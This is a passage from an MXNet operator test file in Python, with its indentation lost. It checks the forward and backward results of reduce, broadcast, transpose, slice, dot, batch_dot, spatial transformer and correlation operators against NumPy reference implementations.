b = mx_reduce_sym(a, keepdims=keepdims, axis=axes)
else:
b = mx_reduce_sym(a, keepdims=keepdims)
elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
naxes = [i for i in range(ndim) if i not in axes]
b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
else:
b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
dat_npy = np.random.rand(*shape)
# Test with both negative and positive values (randomly). Avoid having both in the same
# test, which can be problematic for error checking due to near-zero values.
if np.random.rand() > 0.5:
dat_npy = -dat_npy
if nan_prob > 0:
dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
if sum_groundtruth.shape == ():
sum_groundtruth = np.array([sum_groundtruth])
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
outdata=sum_groundtruth,
axis=axes, keepdims=keepdims,
keepdim_shape=keepdim_shape)
net = b.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
equal_forward = almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, 1E-4, 1E-4)
assert equal_forward
net.backward(out_grads=mx.nd.array(outgrad_npy))
bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
equal_backward = almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, 1E-4, 1E-4)
assert equal_backward
test_none_axis = [True, False]
for test_none in test_none_axis:
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape),
mx.symbol.sum, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
@with_seed()
def test_broadcast():
sample_num = 200
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
@with_seed()
def test_transpose():
for ndim in range(1, 7):
for t in range(5):
dims = list(np.random.randint(1, 10, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_pseudo2dtranspose():
def getTwoInts(mn, mx):
n1 = np.random.randint(mn, mx)
n2 = np.random.randint(mn, mx-1)
n2 = n2 if n2 < n1 else n2+1
return tuple(np.sort([n1, n2]))
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@with_seed()
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@with_seed()
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
@with_seed()
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
@with_seed()
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y.bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y.bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
@with_seed()
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y.bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
@with_seed()
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
@with_seed()
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
@with_seed()
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
@with_seed()
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
for h in [5, 9, 13, 17]: # for convenience test, this third and forth input dim should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn.bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn.bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
@with_seed()
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
pass
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c.simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
@with_seed()
def test_batch_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1.simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
@with_seed()
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) and arg_type1[1] != np.dtype(dtype) and out_type1[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from a is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) and arg_type2[1] != np.dtype(dtype) and out_type2[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from b is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
